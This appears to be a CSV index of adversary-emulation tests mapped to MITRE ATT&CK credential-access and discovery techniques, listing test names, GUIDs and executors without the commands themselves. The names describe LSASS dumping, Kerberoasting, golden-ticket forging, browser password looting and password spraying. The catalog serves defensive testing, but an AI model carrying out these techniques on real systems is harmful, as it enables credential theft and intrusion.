credential-access,T1556.002,Modify Authentication Process: Password Filter DLL,1,Install and Register Password Filter DLL,a7961770-beb5-4134-9674-83d7e1fa865c,powershell
credential-access,T1558.004,Steal or Forge Kerberos Tickets: AS-REP Roasting,1,Rubeus asreproast,615bd568-2859-41b5-9aed-61f6a88e48dd,powershell
credential-access,T1558.004,Steal or Forge Kerberos Tickets: AS-REP Roasting,2,Get-DomainUser with PowerView,d6139549-7b72-4e48-9ea1-324fc9bdf88a,powershell
credential-access,T1558.004,Steal or Forge Kerberos Tickets: AS-REP Roasting,3,WinPwn - PowerSharpPack - Kerberoasting Using Rubeus,8c385f88-4d47-4c9a-814d-93d9deec8c71,powershell
credential-access,T1555,Credentials from Password Stores,1,Extract Windows Credential Manager via VBA,234f9b7c-b53d-4f32-897b-b880a6c9ea7b,powershell
credential-access,T1555,Credentials from Password Stores,2,Dump credentials from Windows Credential Manager With PowerShell [windows Credentials],c89becbe-1758-4e7d-a0f4-97d2188a23e3,powershell
credential-access,T1555,Credentials from Password Stores,3,Dump credentials from Windows Credential Manager With PowerShell [web Credentials],8fd5a296-6772-4766-9991-ff4e92af7240,powershell
credential-access,T1555,Credentials from Password Stores,4,Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Windows Credentials],36753ded-e5c4-4eb5-bc3c-e8fba236878d,powershell
credential-access,T1555,Credentials from Password Stores,5,Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Web Credentials],bc071188-459f-44d5-901a-f8f2625b2d2e,powershell
credential-access,T1555,Credentials from Password Stores,6,WinPwn - Loot local Credentials - lazagne,079ee2e9-6f16-47ca-a635-14efcd994118,powershell
credential-access,T1555,Credentials from Password Stores,7,WinPwn - Loot local Credentials - Wifi Credentials,afe369c2-b42e-447f-98a3-fb1f4e2b8552,powershell
credential-access,T1555,Credentials from Password Stores,8,WinPwn - Loot local Credentials - Decrypt Teamviewer Passwords,db965264-3117-4bad-b7b7-2523b7856b92,powershell
credential-access,T1552,Unsecured Credentials,1,AWS - Retrieve EC2 Password Data using stratus,a21118de-b11e-4ebd-b655-42f11142df0c,sh
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,1,Run Chrome-password Collector,8c05b133-d438-47ca-a630-19cc464c4622,powershell
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,2,Search macOS Safari Cookies,c1402f7b-67ca-43a8-b5f3-3143abedc01b,sh
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,3,LaZagne - Credentials from Browser,9a2915b3-3954-4cce-8c76-00fbf4dbd014,command_prompt
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,4,Simulating access to Chrome Login Data,3d111226-d09a-4911-8715-fe11664f960d,powershell
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,5,Simulating access to Opera Login Data,28498c17-57e4-495a-b0be-cc1e36de408b,powershell
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,6,Simulating access to Windows Firefox Login Data,eb8da98a-2e16-4551-b3dd-83de49baa14c,powershell
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,7,Simulating access to Windows Edge Login Data,a6a5ec26-a2d1-4109-9d35-58b867689329,powershell
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,8,Decrypt Mozilla Passwords with Firepwd.py,dc9cd677-c70f-4df5-bd1c-f114af3c2381,powershell
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,9,LaZagne.py - Dump Credentials from Firefox Browser,87e88698-621b-4c45-8a89-4eaebdeaabb1,sh
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,10,Stage Popular Credential Files for Exfiltration,f543635c-1705-42c3-b180-efd6dc6e7ee7,powershell
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,11,WinPwn - BrowserPwn,764ea176-fb71-494c-90ea-72e9d85dce76,powershell
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,12,WinPwn - Loot local Credentials - mimi-kittenz,ec1d0b37-f659-4186-869f-31a554891611,powershell
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,13,WinPwn - PowerSharpPack - Sharpweb for Browser Credentials,e5e3d639-6ea8-4408-9ecd-d5a286268ca0,powershell
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,14,Simulating Access to Chrome Login Data - MacOS,124e13e5-d8a1-4378-a6ee-a53cd0c7e369,sh
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,15,WebBrowserPassView - Credentials from Browser,e359627f-2d90-4320-ba5e-b0f878155bbe,powershell
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,16,BrowserStealer (Chrome / Firefox / Microsoft Edge),6f2c5c87-a4d5-4898-9bd1-47a55ecaf1dd,powershell
credential-access,T1552.004,Unsecured Credentials: Private Keys,1,Private Keys,520ce462-7ca7-441e-b5a5-f8347f632696,command_prompt
credential-access,T1552.004,Unsecured Credentials: Private Keys,2,Discover Private SSH Keys,46959285-906d-40fa-9437-5a439accd878,sh
credential-access,T1552.004,Unsecured Credentials: Private Keys,3,Copy Private SSH Keys with CP,7c247dc7-5128-4643-907b-73a76d9135c3,sh
credential-access,T1552.004,Unsecured Credentials: Private Keys,4,Copy Private SSH Keys with rsync,864bb0b2-6bb5-489a-b43b-a77b3a16d68a,sh
credential-access,T1552.004,Unsecured Credentials: Private Keys,5,Copy the users GnuPG directory with rsync,2a5a0601-f5fb-4e2e-aa09-73282ae6afca,sh
credential-access,T1552.004,Unsecured Credentials: Private Keys,6,ADFS token signing and encryption certificates theft - Local,78e95057-d429-4e66-8f82-0f060c1ac96f,powershell
credential-access,T1552.004,Unsecured Credentials: Private Keys,7,ADFS token signing and encryption certificates theft - Remote,cab413d8-9e4a-4b8d-9b84-c985bd73a442,powershell
credential-access,T1552.004,Unsecured Credentials: Private Keys,8,CertUtil ExportPFX,336b25bf-4514-4684-8924-474974f28137,powershell
credential-access,T1552.004,Unsecured Credentials: Private Keys,9,Export Root Certificate with Export-PFXCertificate,7617f689-bbd8-44bc-adcd-6f8968897848,powershell
credential-access,T1552.004,Unsecured Credentials: Private Keys,10,Export Root Certificate with Export-Certificate,78b274f8-acb0-428b-b1f7-7b0d0e73330a,powershell
credential-access,T1552.004,Unsecured Credentials: Private Keys,11,Export Certificates with Mimikatz,290df60e-4b5d-4a5e-b0c7-dc5348ea0c86,command_prompt
credential-access,T1557.001,Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay,1,LLMNR Poisoning with Inveigh (PowerShell),deecd55f-afe0-4a62-9fba-4d1ba2deb321,powershell
credential-access,T1003.001,OS Credential Dumping: LSASS Memory,1,Dump LSASS.exe Memory using ProcDump,0be2230c-9ab3-4ac2-8826-3199b9a0ebf8,command_prompt
credential-access,T1003.001,OS Credential Dumping: LSASS Memory,2,Dump LSASS.exe Memory using comsvcs.dll,2536dee2-12fb-459a-8c37-971844fa73be,powershell
credential-access,T1003.001,OS Credential Dumping: LSASS Memory,3,Dump LSASS.exe Memory using direct system calls and API unhooking,7ae7102c-a099-45c8-b985-4c7a2d05790d,command_prompt
credential-access,T1003.001,OS Credential Dumping: LSASS Memory,4,Dump LSASS.exe Memory using NanoDump,dddd4aca-bbed-46f0-984d-e4c5971c51ea,command_prompt
credential-access,T1003.001,OS Credential Dumping: LSASS Memory,5,Dump LSASS.exe Memory using Windows Task Manager,dea6c349-f1c6-44f3-87a1-1ed33a59a607,manual
credential-access,T1003.001,OS Credential Dumping: LSASS Memory,6,Offline Credential Theft With Mimikatz,453acf13-1dbd-47d7-b28a-172ce9228023,command_prompt
credential-access,T1003.001,OS Credential Dumping: LSASS Memory,7,LSASS read with pypykatz,c37bc535-5c62-4195-9cc3-0517673171d8,command_prompt
credential-access,T1003.001,OS Credential Dumping: LSASS Memory,8,Dump LSASS.exe Memory using Out-Minidump.ps1,6502c8f0-b775-4dbd-9193-1298f56b6781,powershell
credential-access,T1003.001,OS Credential Dumping: LSASS Memory,9,Create Mini Dump of LSASS.exe using ProcDump,7cede33f-0acd-44ef-9774-15511300b24b,command_prompt
credential-access,T1003.001,OS Credential Dumping: LSASS Memory,10,Powershell Mimikatz,66fb0bc1-3c3f-47e9-a298-550ecfefacbc,powershell
credential-access,T1003.001,OS Credential Dumping: LSASS Memory,11,Dump LSASS with createdump.exe from .Net v5,9d0072c8-7cca-45c4-bd14-f852cfa35cf0,powershell
credential-access,T1003.001,OS Credential Dumping: LSASS Memory,12,Dump LSASS.exe using imported Microsoft DLLs,86fc3f40-237f-4701-b155-81c01c48d697,powershell
credential-access,T1110.003,Brute Force: Password Spraying,1,Password Spray all Domain Users,90bc2e54-6c84-47a5-9439-0a2a92b4b175,command_prompt
credential-access,T1110.003,Brute Force: Password Spraying,2,Password Spray (DomainPasswordSpray),263ae743-515f-4786-ac7d-41ef3a0d4b2b,powershell
credential-access,T1110.003,Brute Force: Password Spraying,3,Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos),f14d956a-5b6e-4a93-847f-0c415142f07d,powershell
credential-access,T1110.003,Brute Force: Password Spraying,4,Password spray all Azure AD users with a single password,a8aa2d3e-1c52-4016-bc73-0f8854cfa80a,powershell
credential-access,T1110.003,Brute Force: Password Spraying,5,WinPwn - DomainPasswordSpray Attacks,5ccf4bbd-7bf6-43fc-83ac-d9e38aff1d82,powershell
credential-access,T1110.003,Brute Force: Password Spraying,6,Password Spray Invoke-DomainPasswordSpray Light,b15bc9a5-a4f3-4879-9304-ea0011ace63a,powershell
credential-access,T1110.003,Brute Force: Password Spraying,7,Password Spray Microsoft Online Accounts with MSOLSpray (Azure/O365),f3a10056-0160-4785-8744-d9bd7c12dc39,powershell
credential-access,T1110.003,Brute Force: Password Spraying,8,Password Spray using Kerbrute Tool,c6f25ec3-6475-47a9-b75d-09ac593c5ecb,powershell
credential-access,T1110.003,Brute Force: Password Spraying,9,AWS - Password Spray an AWS using GoAWSConsoleSpray,9c10d16b-20b1-403a-8e67-50ef7117ed4e,sh
credential-access,T1003.005,OS Credential Dumping: Cached Domain Credentials,1,Cached Credential Dump via Cmdkey,56506854-89d6-46a3-9804-b7fde90791f9,command_prompt
credential-access,T1558.001,Steal or Forge Kerberos Tickets: Golden Ticket,1,Crafting Active Directory golden tickets with mimikatz,9726592a-dabc-4d4d-81cd-44070008b3af,powershell
credential-access,T1558.001,Steal or Forge Kerberos Tickets: Golden Ticket,2,Crafting Active Directory golden tickets with Rubeus,e42d33cd-205c-4acf-ab59-a9f38f6bad9c,powershell
credential-access,T1649,Steal or Forge Authentication Certificates,1,Staging Local Certificates via Export-Certificate,eb121494-82d1-4148-9e2b-e624e03fbf3d,powershell
credential-access,T1552.003,Unsecured Credentials: Bash History,1,Search Through Bash History,3cfde62b-7c33-4b26-a61e-755d6131c8ce,sh
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,1,Find AWS credentials,2b93758e-a8d7-4e3b-bc7b-d3aa8d7ecb17,sh
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,2,Extract Browser and System credentials with LaZagne,9e507bb8-1d30-4e3b-a49b-cb5727d7ea79,bash
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,3,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,4,Extracting passwords with findstr,0e56bf29-ff49-4ea5-9af4-3b81283fd513,powershell
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,5,Access unattend.xml,367d4004-5fc0-446d-823f-960c74ae52c3,command_prompt
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,6,Find and Access Github Credentials,da4f751a-020b-40d7-b9ff-d433b7799803,bash
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,7,WinPwn - sensitivefiles,114dd4e3-8d1c-4ea7-bb8d-8d8f6aca21f0,powershell
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,8,WinPwn - Snaffler,fdd0c913-714b-4c13-b40f-1824d6c015f2,powershell
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,9,WinPwn - powershellsensitive,75f66e03-37d3-4704-9520-3210efbe33ce,powershell
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,10,WinPwn - passhunt,00e3e3c7-6c3c-455e-bd4b-461c7f0e7797,powershell
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,11,WinPwn - SessionGopher,c9dc9de3-f961-4284-bd2d-f959c9f9fda5,powershell
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,12,"WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials",aaa87b0e-5232-4649-ae5c-f1724a4b2798,powershell
credential-access,T1528,Steal Application Access Token,1,Azure - Dump All Azure Key Vaults with Microburst,1b83cddb-eaa7-45aa-98a5-85fb0a8807ea,powershell
credential-access,T1552.006,Unsecured Credentials: Group Policy Preferences,1,GPP Passwords (findstr),870fe8fb-5e23-4f5f-b89d-dd7fe26f3b5f,command_prompt
credential-access,T1552.006,Unsecured Credentials: Group Policy Preferences,2,GPP Passwords (Get-GPPPassword),e9584f82-322c-474a-b831-940fd8b4455c,powershell
credential-access,T1056.002,Input Capture: GUI Input Capture,1,AppleScript - Prompt User for Password,76628574-0bc1-4646-8fe2-8f4427b47d15,bash
credential-access,T1056.002,Input Capture: GUI Input Capture,2,PowerShell - Prompt User for Password,2b162bfd-0928-4d4c-9ec3-4d9f88374b52,powershell
credential-access,T1110.004,Brute Force: Credential Stuffing,1,SSH Credential Stuffing From Linux,4f08197a-2a8a-472d-9589-cd2895ef22ad,bash
credential-access,T1110.004,Brute Force: Credential Stuffing,2,SSH Credential Stuffing From MacOS,d546a3d9-0be5-40c7-ad82-5a7d79e1b66b,bash
credential-access,T1110.004,Brute Force: Credential Stuffing,3,Brute Force:Credential Stuffing using Kerbrute Tool,4852c630-87a9-409b-bb5e-5dc12c9ebcde,powershell
credential-access,T1187,Forced Authentication,1,PetitPotam,485ce873-2e65-4706-9c7e-ae3ab9e14213,powershell
credential-access,T1187,Forced Authentication,2,WinPwn - PowerSharpPack - Retrieving NTLM Hashes without Touching LSASS,7f06b25c-799e-40f1-89db-999c9cc84317,powershell
credential-access,T1003.008,OS Credential Dumping: /etc/passwd and /etc/shadow,1,Access /etc/shadow (Local),3723ab77-c546-403c-8fb4-bb577033b235,bash
credential-access,T1003.008,OS Credential Dumping: /etc/passwd and /etc/shadow,2,Access /etc/passwd (Local),60e860b6-8ae6-49db-ad07-5e73edd88f5d,sh
credential-access,T1003.008,OS Credential Dumping: /etc/passwd and /etc/shadow,3,"Access /etc/{shadow,passwd} with a standard bin that's not cat",df1a55ae-019d-4120-bc35-94f4bc5c4b0a,bash
credential-access,T1003.008,OS Credential Dumping: /etc/passwd and /etc/shadow,4,"Access /etc/{shadow,passwd} with shell builtins",f5aa6543-6cb2-4fae-b9c2-b96e14721713,bash
credential-access,T1558.002,Steal or Forge Kerberos Tickets: Silver Ticket,1,Crafting Active Directory silver tickets with mimikatz,385e59aa-113e-4711-84d9-f637aef01f2c,powershell
credential-access,T1555.004,Credentials from Password Stores: Windows Credential Manager,1,Access Saved Credentials via VaultCmd,9c2dd36d-5c8b-4b29-8d72-a11b0d5d7439,command_prompt
credential-access,T1555.004,Credentials from Password Stores: Windows Credential Manager,2,WinPwn - Loot local Credentials - Invoke-WCMDump,fa714db1-63dd-479e-a58e-7b2b52ca5997,powershell
credential-access,T1003.003,OS Credential Dumping: NTDS,1,Create Volume Shadow Copy with vssadmin,dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f,command_prompt
credential-access,T1003.003,OS Credential Dumping: NTDS,2,Copy NTDS.dit from Volume Shadow Copy,c6237146-9ea6-4711-85c9-c56d263a6b03,command_prompt
credential-access,T1003.003,OS Credential Dumping: NTDS,3,Dump Active Directory Database with NTDSUtil,2364e33d-ceab-4641-8468-bfb1d7cc2723,command_prompt
credential-access,T1003.003,OS Credential Dumping: NTDS,4,Create Volume Shadow Copy with WMI,224f7de0-8f0a-4a94-b5d8-989b036c86da,command_prompt
credential-access,T1003.003,OS Credential Dumping: NTDS,5,Create Volume Shadow Copy remotely with WMI,d893459f-71f0-484d-9808-ec83b2b64226,command_prompt
credential-access,T1003.003,OS Credential Dumping: NTDS,6,Create Volume Shadow Copy remotely (WMI) with esentutl,21c7bf80-3e8b-40fa-8f9d-f5b194ff2865,command_prompt
credential-access,T1003.003,OS Credential Dumping: NTDS,7,Create Volume Shadow Copy with Powershell,542bb97e-da53-436b-8e43-e0a7d31a6c24,powershell
credential-access,T1003.003,OS Credential Dumping: NTDS,8,Create Symlink to Volume Shadow Copy,21748c28-2793-4284-9e07-d6d028b66702,command_prompt
credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,1,Request for service tickets,3f987809-3681-43c8-bcd8-b3ff3a28533a,powershell
credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,2,Rubeus kerberoast,14625569-6def-4497-99ac-8e7817105b55,powershell
credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,3,Extract all accounts in use as SPN using setspn,e6f4affd-d826-4871-9a62-6c9004b8fe06,command_prompt
credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,4,Request A Single Ticket via PowerShell,988539bc-2ed7-4e62-aec6-7c5cf6680863,powershell
credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,5,Request All Tickets via PowerShell,902f4ed2-1aba-4133-90f2-cff6d299d6da,powershell
credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,6,WinPwn - Kerberoasting,78d10e20-c874-45f2-a9df-6fea0120ec27,powershell
credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,7,WinPwn - PowerSharpPack - Kerberoasting Using Rubeus,29094950-2c96-4cbd-b5e4-f7c65079678f,powershell
credential-access,T1003.006,OS Credential Dumping: DCSync,1,DCSync (Active Directory),129efd28-8497-4c87-a1b0-73b9a870ca3e,command_prompt
credential-access,T1003.006,OS Credential Dumping: DCSync,2,Run DSInternals Get-ADReplAccount,a0bced08-3fc5-4d8b-93b7-e8344739376e,powershell
credential-access,T1056.004,Input Capture: Credential API Hooking,1,Hook PowerShell TLS Encrypt/Decrypt Messages,de1934ea-1fbf-425b-8795-65fb27dd7e33,powershell
credential-access,T1552.007,Kubernetes List Secrets,1,List All Secrets,31e794c4-48fd-4a76-aca4-6587c155bc11,bash
credential-access,T1552.007,Kubernetes List Secrets,2,ListSecrets,43c3a49d-d15c-45e6-b303-f6e177e44a9a,bash
credential-access,T1552.007,Kubernetes List Secrets,3,Cat the contents of a Kubernetes service account token file,788e0019-a483-45da-bcfe-96353d46820f,sh
discovery,T1033,System Owner/User Discovery,1,System Owner/User Discovery,4c4959bf-addf-4b4a-be86-8d09cc1857aa,command_prompt
discovery,T1033,System Owner/User Discovery,2,System Owner/User Discovery,2a9b677d-a230-44f4-ad86-782df1ef108c,sh
discovery,T1033,System Owner/User Discovery,3,Find computers where user has session - Stealth mode (PowerView),29857f27-a36f-4f7e-8084-4557cd6207ca,powershell
discovery,T1033,System Owner/User Discovery,4,User Discovery With Env Vars PowerShell Script,dcb6cdee-1fb0-4087-8bf8-88cfd136ba51,powershell
discovery,T1033,System Owner/User Discovery,5,GetCurrent User with PowerShell Script,1392bd0f-5d5a-429e-81d9-eb9d4d4d5b3b,powershell
discovery,T1033,System Owner/User Discovery,6,System Discovery - SocGholish whoami,3d257a03-eb80-41c5-b744-bb37ac7f65c7,powershell
discovery,T1613,Container and Resource Discovery,1,Container and ResourceDiscovery,8a895923-f99f-4668-acf2-6cc59a44f05e,sh
discovery,T1615,Group Policy Discovery,1,Display group policy information via gpresult,0976990f-53b1-4d3f-a185-6df5be429d3b,command_prompt
discovery,T1615,Group Policy Discovery,2,Get-DomainGPO to display group policy information via PowerView,4e524c4e-0e02-49aa-8df5-93f3f7959b9f,powershell
discovery,T1615,Group Policy Discovery,3,WinPwn - GPOAudit,bc25c04b-841e-4965-855f-d1f645d7ab73,powershell
discovery,T1615,Group Policy Discovery,4,WinPwn - GPORemoteAccessPolicy,7230d01a-0a72-4bd5-9d7f-c6d472bc6a59,powershell
discovery,T1615,Group Policy Discovery,5,MSFT Get-GPO Cmdlet,52778a8f-a10b-41a4-9eae-52ddb74072bf,powershell
discovery,T1087.002,Account Discovery: Domain Account,1,Enumerate all accounts (Domain),6fbc9e68-5ad7-444a-bd11-8bf3136c477e,command_prompt
discovery,T1087.002,Account Discovery: Domain Account,2,Enumerate all accounts via PowerShell (Domain),8b8a6449-be98-4f42-afd2-dedddc7453b2,powershell
discovery,T1087.002,Account Discovery: Domain Account,3,Enumerate logged on users via CMD (Domain),161dcd85-d014-4f5e-900c-d3eaae82a0f7,command_prompt
discovery,T1087.002,Account Discovery: Domain Account,4,Automated AD Recon (ADRecon),95018438-454a-468c-a0fa-59c800149b59,powershell
discovery,T1087.002,Account Discovery: Domain Account,5,Adfind -Listing password policy,736b4f53-f400-4c22-855d-1a6b5a551600,command_prompt
discovery,T1087.002,Account Discovery: Domain Account,6,Adfind - Enumerate Active Directory Admins,b95fd967-4e62-4109-b48d-265edfd28c3a,command_prompt
discovery,T1087.002,Account Discovery: Domain Account,7,Adfind - Enumerate Active Directory User Objects,e1ec8d20-509a-4b9a-b820-06c9b2da8eb7,command_prompt
discovery,T1087.002,Account Discovery: Domain Account,8,Adfind - Enumerate Active Directory Exchange AD Objects,5e2938fb-f919-47b6-8b29-2f6a1f718e99,command_prompt
discovery,T1087.002,Account Discovery: Domain Account,9,Enumerate Default Domain Admin Details (Domain),c70ab9fd-19e2-4e02-a83c-9cfa8eaa8fef,command_prompt
discovery,T1087.002,Account Discovery: Domain Account,10,Enumerate Active Directory for Unconstrained Delegation,46f8dbe9-22a5-4770-8513-66119c5be63b,powershell
discovery,T1087.002,Account Discovery: Domain Account,11,Get-DomainUser with PowerView,93662494-5ed7-4454-a04c-8c8372808ac2,powershell
discovery,T1087.002,Account Discovery: Domain Account,12,Enumerate Active Directory Users with ADSISearcher,02e8be5a-3065-4e54-8cc8-a14d138834d3,powershell
discovery,T1087.002,Account Discovery: Domain Account,13,Enumerate Linked Policies In ADSISearcher Discovery,7ab0205a-34e4-4a44-9b04-e1541d1a57be,powershell
discovery,T1087.002,Account Discovery: Domain Account,14,Enumerate Root Domain linked policies Discovery,00c652e2-0750-4ca6-82ff-0204684a6fe4,powershell
discovery,T1087.002,Account Discovery: Domain Account,15,WinPwn - generaldomaininfo,ce483c35-c74b-45a7-a670-631d1e69db3d,powershell
discovery,T1087.002,Account Discovery: Domain Account,16,Kerbrute - userenum,f450461c-18d1-4452-9f0d-2c42c3f08624,powershell
discovery,T1087.002,Account Discovery: Domain Account,17,Wevtutil - Discover NTLM Users Remote,b8a563d4-a836-4993-a74e-0a19b8481bfe,powershell
discovery,T1087.002,Account Discovery: Domain Account,18,Suspicious LAPS Attributes Query with Get-ADComputer all properties,394012d9-2164-4d4f-b9e5-acf30ba933fe,powershell
discovery,T1087.002,Account Discovery: Domain Account,19,Suspicious LAPS Attributes Query with Get-ADComputer ms-Mcs-AdmPwd property,6e85bdf9-7bc4-4259-ac0f-f0cb39964443,powershell
discovery,T1087.002,Account Discovery: Domain Account,20,Suspicious LAPS Attributes Query with Get-ADComputer all properties and SearchScope,ffbcfd62-15d6-4989-a21a-80bfc8e58bb5,powershell
discovery,T1087.002,Account Discovery: Domain Account,21,Suspicious LAPS Attributes Query with adfind all properties,abf00f6c-9983-4d9a-afbc-6b1c6c6448e1,powershell
discovery,T1087.002,Account Discovery: Domain Account,22,Suspicious LAPS Attributes Query with adfind ms-Mcs-AdmPwd,51a98f96-0269-4e09-a10f-e307779a8b05,powershell
discovery,T1087.001,Account Discovery: Local Account,1,Enumerate all accounts (Local),f8aab3dd-5990-4bf8-b8ab-2226c951696f,sh
discovery,T1087.001,Account Discovery: Local Account,2,View sudoers access,fed9be70-0186-4bde-9f8a-20945f9370c2,sh
discovery,T1087.001,Account Discovery: Local Account,3,View accounts with UID 0,c955a599-3653-4fe5-b631-f11c00eb0397,sh
discovery,T1087.001,Account Discovery: Local Account,4,List opened files by user,7e46c7a5-0142-45be-a858-1a3ecb4fd3cb,sh
discovery,T1087.001,Account Discovery: Local Account,5,Show if a user account has ever logged in remotely,0f0b6a29-08c3-44ad-a30b-47fd996b2110,sh
discovery,T1087.001,Account Discovery: Local Account,6,Enumerate users and groups,e6f36545-dc1e-47f0-9f48-7f730f54a02e,sh
discovery,T1087.001,Account Discovery: Local Account,7,Enumerate users and groups,319e9f6c-7a9e-432e-8c62-9385c803b6f2,sh
discovery,T1087.001,Account Discovery: Local Account,8,Enumerate all accounts on Windows (Local),80887bec-5a9b-4efc-a81d-f83eb2eb32ab,command_prompt
discovery,T1087.001,Account Discovery: Local Account,9,Enumerate all accounts via PowerShell (Local),ae4b6361-b5f8-46cb-a3f9-9cf108ccfe7b,powershell
discovery,T1087.001,Account Discovery: Local Account,10,Enumerate logged on users via CMD (Local),a138085e-bfe5-46ba-a242-74a6fb884af3,command_prompt
discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,1,Detect Virtualization Environment (Linux),dfbd1a21-540d-4574-9731-e852bd6fe840,sh
discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,2,Detect Virtualization Environment (Windows),502a7dc4-9d6f-4d28-abf2-f0e84692562d,powershell
discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,3,Detect Virtualization Environment (MacOS),a960185f-aef6-4547-8350-d1ce16680d09,sh
discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,4,Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows),4a41089a-48e0-47aa-82cb-5b81a463bc78,powershell
discovery,T1069.002,Permission Groups Discovery: Domain Groups,1,Basic Permission Groups Discovery Windows (Domain),dd66d77d-8998-48c0-8024-df263dc2ce5d,command_prompt
discovery,T1069.002,Permission Groups Discovery: Domain Groups,2,Permission Groups Discovery PowerShell (Domain),6d5d8c96-3d2a-4da9-9d6d-9a9d341899a7,powershell
discovery,T1069.002,Permission Groups Discovery: Domain Groups,3,Elevated group enumeration using net group (Domain),0afb5163-8181-432e-9405-4322710c0c37,command_prompt
discovery,T1069.002,Permission Groups Discovery: Domain Groups,4,Find machines where user has local admin access (PowerView),a2d71eee-a353-4232-9f86-54f4288dd8c1,powershell
discovery,T1069.002,Permission Groups Discovery: Domain Groups,5,Find local admins on all machines in domain (PowerView),a5f0d9f8-d3c9-46c0-8378-846ddd6b1cbd,powershell
discovery,T1069.002,Permission Groups Discovery: Domain Groups,6,Find Local Admins via Group Policy (PowerView),64fdb43b-5259-467a-b000-1b02c00e510a,powershell
discovery,T1069.002,Permission Groups Discovery: Domain Groups,7,Enumerate Users Not Requiring Pre Auth (ASRepRoast),870ba71e-6858-4f6d-895c-bb6237f6121b,powershell
discovery,T1069.002,Permission Groups Discovery: Domain Groups,8,Adfind - Query Active Directory Groups,48ddc687-82af-40b7-8472-ff1e742e8274,command_prompt
discovery,T1069.002,Permission Groups Discovery: Domain Groups,9,Enumerate Active Directory Groups with Get-AdGroup,3d1fcd2a-e51c-4cbe-8d84-9a843bad8dc8,powershell
discovery,T1069.002,Permission Groups Discovery: Domain Groups,10,Enumerate Active Directory Groups with ADSISearcher,9f4e344b-8434-41b3-85b1-d38f29d148d0,powershell
discovery,T1069.002,Permission Groups Discovery: Domain Groups,11,Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting),43fa81fb-34bb-4b5f-867b-03c7dbe0e3d8,powershell
discovery,T1069.002,Permission Groups Discovery: Domain Groups,12,Get-DomainGroupMember with PowerView,46352f40-f283-4fe5-b56d-d9a71750e145,powershell
discovery,T1069.002,Permission Groups Discovery: Domain Groups,13,Get-DomainGroup with PowerView,5a8a181c-2c8e-478d-a943-549305a01230,powershell
discovery,T1069.002,Permission Groups Discovery: Domain Groups,14,Active Directory Enumeration with LDIFDE,22cf8cb9-adb1-4e8c-80ca-7c723dfc8784,command_prompt
discovery,T1007,System Service Discovery,1,System Service Discovery,89676ba1-b1f8-47ee-b940-2e1a113ebc71,command_prompt
discovery,T1007,System Service Discovery,2,System Service Discovery - net.exe,5f864a3f-8ce9-45c0-812c-bdf7d8aeacc3,command_prompt
discovery,T1007,System Service Discovery,3,System Service Discovery - systemctl,f4b26bce-4c2c-46c0-bcc5-fce062d38bef,bash
discovery,T1040,Network Sniffing,1,Packet Capture Linux using tshark or tcpdump,7fe741f7-b265-4951-a7c7-320889083b3e,bash
discovery,T1040,Network Sniffing,2,Packet Capture macOS using tcpdump or tshark,9d04efee-eff5-4240-b8d2-07792b873608,bash
discovery,T1040,Network Sniffing,3,Packet Capture Windows Command Prompt,a5b2f6a0-24b4-493e-9590-c699f75723ca,command_prompt
discovery,T1040,Network Sniffing,4,Windows Internal Packet Capture,b5656f67-d67f-4de8-8e62-b5581630f528,command_prompt
discovery,T1040,Network Sniffing,5,Windows Internal pktmon capture,c67ba807-f48b-446e-b955-e4928cd1bf91,command_prompt
discovery,T1040,Network Sniffing,6,Windows Internal pktmon set filter,855fb8b4-b8ab-4785-ae77-09f5df7bff55,command_prompt
discovery,T1040,Network Sniffing,7,Packet Capture macOS using /dev/bpfN with sudo,e6fe5095-545d-4c8b-a0ae-e863914be3aa,bash
discovery,T1040,Network Sniffing,8,Filtered Packet Capture macOS using /dev/bpfN with sudo,e2480aee-23f3-4f34-80ce-de221e27cd19,bash
discovery,T1040,Network Sniffing,9,"Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo",10c710c9-9104-4d5f-8829-5b65391e2a29,bash
